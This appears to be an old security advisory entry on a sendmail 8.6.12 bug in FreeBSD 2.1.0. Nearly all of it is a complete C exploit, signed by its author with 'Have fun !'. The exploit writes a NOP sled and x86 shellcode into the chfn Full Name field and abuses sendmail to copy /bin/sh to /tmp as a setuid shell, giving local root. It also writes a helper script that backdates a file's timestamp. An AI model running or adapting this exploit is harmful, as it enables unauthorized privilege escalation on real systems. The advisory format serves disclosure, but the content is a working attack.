COMMAND

    sendmail

SYSTEMS AFFECTED

    FreeBSD running sendmail 8.6.12

PROBLEM


/* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
/* If you have any problems with it, send letter to me.                     */
/*                             Have fun !                                   */


/* -----------------   Dedicated to my beautiful lady   ------------------  */
/* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */

#include <stdio.h>
main()
{
void make_files();
     make_files();
     system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
echo See result in /tmp");
}

void make_files()
 {
  int i,j;
  FILE *f;
  char nop_string[200];
  char code_string[]=
                      {
                         "\xeb\x50"                         /* jmp    cont */

/* geteip: */            "\x5d"                             /* popl   %ebp */
                         "\x55"                             /* pushl  %ebp */
                         "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc
3(%ebp) */
                         "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd
7(%ebp) */
                         "\xc3"                             /* ret */

/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
/* 0xffffffc3(%ebp): */ "\x3c"
                        "chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
                        "-leshka-leshka-leshka-leshka-"    /* reserved */

/* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf7
0,%esp */
                        "\xe8\xa5\xff\xff\xff"             /* call   geteip */
                        "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4fffff
f,%ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0
  */
                        "\xc3"                             /* ret */
                        "-leshka-leshka-leshka-leshka-"    /* reserved */
                        "\xa0\xcf\xbf\xef"
                     };

  j=269-sizeof(code_string);
  for(i=0;i<j;nop_string[i++]='\x90');
  nop_string[j]='\0';

  f=fopen("user.inf","w");
  fprintf(f,"#Changing user database information for leshka\n");
  fprintf(f,"Shell: /usr/local/bin/bash\n");
  fprintf(f,"Location: \n");
  fprintf(f,"Office Phone: \n");
  fprintf(f,"Home Phone: \n");
  fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
  fclose(f);

  f=fopen("hack","w");
  fprintf(f,"cat user.inf>\"$1\"\n");
  fprintf(f,"touch -t 2510711313 \"$1\"\n");
  fclose(f);
 }

SOLUTION

    Get new sendmail (every week or so :-)).